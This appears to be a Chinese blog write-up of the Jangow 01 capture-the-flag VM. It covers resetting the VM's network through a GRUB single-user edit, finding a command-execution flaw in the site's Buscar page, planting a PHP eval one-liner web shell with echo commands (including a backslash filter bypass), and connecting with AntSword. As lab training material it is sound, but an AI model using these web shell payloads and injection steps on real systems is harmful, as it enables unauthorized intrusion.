jangow-01-1.0.1

首先kali终端运行以下命令查看靶机ip

这里我们发现并没有查到靶机的ip,这时我们重启靶机

打开靶机,按下shift,出现下图界面

再次按下e键,进入到如下界面

将ro替换为rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

输入vi /etc/network/interfaces编辑网卡信息,改完后按shift+?键才能输出保存,修改完成后重启靶机即可

然后来到kali终端,继续运行以下命令查看靶机ip

这样我们就可以得到靶机的ip了

浏览器访问此ip

点击site文件夹,网页跳转

把所有的功能点都点一遍,当我们点击Buscar时,出现以下页面,发现有传参的地方

输入命令看看能不能执行,发现成功解析

那么我们就可以确定该处存在命令执行漏洞

尝试将一句话木马写入文件中,具体代码如下

echo "<?php @eval($_POST[a]);?>" > 1.php

再次写入一个1.txt文件,测试是否成功写入

echo "<?php @eval($_POST[a]);?>" > 1.txt

接下来访问这个文件,发现传参方式被过滤

可以在被过滤的地方加一个反斜杠,再次写入

echo "<?php @eval(\$_POST[a]);?>" > 1.txt

再次访问1.txt,测试可以成功写入

修改后缀名为1.php,重新写入

echo "<?php @eval(\$_POST[a]);?>" > 1.php

尝试访问1.php,蚁剑连接

连接成功,获取getshell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值